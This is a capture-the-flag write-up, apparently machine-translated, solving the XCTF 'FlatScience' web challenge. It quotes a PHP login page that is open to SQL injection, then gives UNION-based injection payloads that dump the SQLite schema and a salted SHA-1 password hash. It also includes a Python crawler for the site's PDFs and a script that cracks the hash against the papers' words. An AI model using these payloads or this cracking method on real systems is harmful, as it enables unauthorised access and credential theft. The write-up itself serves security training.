Offensive and defensive world FlatScience

• All kinds of here these point url constantly changing
• Scan some directly with dirsearch
  -robots.txt is often used to do problems recently! ! ! 1 Visited and gave admin.php and login.php
• Access to the login interface is a login window. Access to the admin interface is also a login window, but the account has been given to you.
• Seeing the login interface is difficult, try SQL injection
  
• Here I think of a SQL injection and md5 encryption problem that I did before.
• But this one needs to know the query code
• F12 view page source code foundTODO: Remove ?debug-Parameter!

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
    
    
        $user = $_POST['usr'];
        $pass = $_POST['pw'];
        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
    
    
        $row = $res->fetchArray();
    }
    else{
    
    
        echo "<br>Some Error occourred!";
    }
    if(isset($row['id'])){
    
    
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }
}
if(isset($_GET['debug']))
highlight_file('login.php');
?> 

• The key two lines of code

 $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");

 setcookie('name',' '.$row['name'], time() + 60, '/');

• So the queried information can be found in the cookie
• Here to supplement the knowledge points of the sqlite database
• Sqlite has a sqlite_master table (the global schema table stores the definitions of all tables, views, indexes, triggers, etc. in this database, and the SQL definitions of the user tables can be found
• ' union select name,sql from sqlite_master--
• result

• Set-Cookie: name=+CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29; expires=Wed, 24-Feb-2021 11:27:33 GMT; Max-Age=60; path=/
• 解码：CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255)); expires=Wed, 24-Feb-2021 11:27:33 GMT; Max-Age=60; path=/

• Get the Users table with id, name, password, hint fields
• ' union select name,password from Users--Query password
• get3fab54a50e770d830c0416df817567662a9dc85c
• Should be sha1($pass."Salz!")the result
• Here you can be very happy to tell you that some websites can be decrypted
  
• The direct access admin.phplogin password is ThinJerboa
• This is unexpected
• The expected solution is below
• ' union select name,hint from Users--Query hint
• my fav word in my fav paper?!
• So the password should be in its paper two days ago, lamenting that there is no time to practice python, the opportunity is here
• Crawl all the files first
• Code

import urllib.request
import requests
import re
import os
import sys

re1 = '[a-fA-F0-9]{32,32}.pdf' # 设置正则表达式匹配pdf文件
re2 = '[0-9\/]{2,2}index.html'

pdf_list = []
def get_pdf(url):
    global pdf_list
    print(url)
    req = requests.get(url).text
    # 获取该页面的所有reques Response的Unicode编码内容
    re_pdf = re.findall(re1,req)
    # 用正则表达式获取该页面中的pdf文件名称
    for index in re_pdf:
        pdf_url=url + index
        pdf_list.append(pdf_url)
    # 这道题狗在 还有很多pdf文件在其他页面 所以需要去访问其他页面再去获取该页面下的pdf
    re_html = re.findall(re2,req)
    # 依次去访问所有的1/2这些页面 每次访问并获取该页面下的pdf文件
    for j in re_html:
        new_url = url+j[0:2] # 切片 将1/index.html 只取1/
        print(new_url)
        get_pdf(new_url)
    return pdf_list

def download(i,url):
    file_name =str(i)+'.pdf'
    req = requests.get(url)
    f = open(r'C:\Users\lenovo\Desktop\python\buuctf做题脚本\XCTF-FlatScience\pdf\\'+file_name,'wb')
    f.write(req.content) # content返回的是HTTP内容的二进制形式
    f.close()
    print('Sucessful to download'+' '+file_name)


    
if __name__=='__main__':
    pdf_list = get_pdf('http://111.200.241.244:41641/')
    for i in range(len(pdf_list)):
        download(i,pdf_list[i])

• Above is the code to download all pdf files
• Pro-test effective
  
• The next thing to do is this is the script of the boss

from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
 
def get_pdf():
	return [i for i in os.listdir("./") if i.endswith("pdf")]
 
 
def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
	pdf_path = get_pdf()
	for i in pdf_path:
		print "Searching word in " + i
		pdf_text = convert_pdf_2_text(i).split(" ")
		for word in pdf_text:
			sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
			if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
				print "Find the password :" + word
				exit()
 
if __name__ == "__main__":
	find_password()

• The result of the operation is that the password login of the admin account has a flag
• The second script is beyond my ability...